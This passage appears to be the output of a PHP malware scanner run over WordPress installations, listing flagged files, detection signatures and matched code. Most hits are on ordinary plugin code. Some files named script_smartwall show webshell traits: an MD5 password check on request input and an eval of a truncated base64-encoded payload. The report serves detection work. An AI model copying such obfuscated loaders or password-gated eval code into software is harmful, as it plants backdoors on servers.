eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 06:35:35 Modified: 2021-05-26 08:49:37 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 06:35:35 Modified: 2021-05-26 08:49:37 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 06:35:36 Modified: 2021-05-26 08:49:37 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/spb/data/www/parnispb.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 135.64 kB Created: 2020-09-15 19:17:23 Modified: 2021-05-22 17:55:20 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1207 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-06-25 13:23:25 Modified: 2021-06-25 13:23:25 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-06-25 13:23:25 Modified: 2021-06-25 13:23:25 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-06-25 13:23:27 Modified: 2021-06-25 13:23:27 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-06-25 13:23:28 Modified: 2021-06-25 13:23:28 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
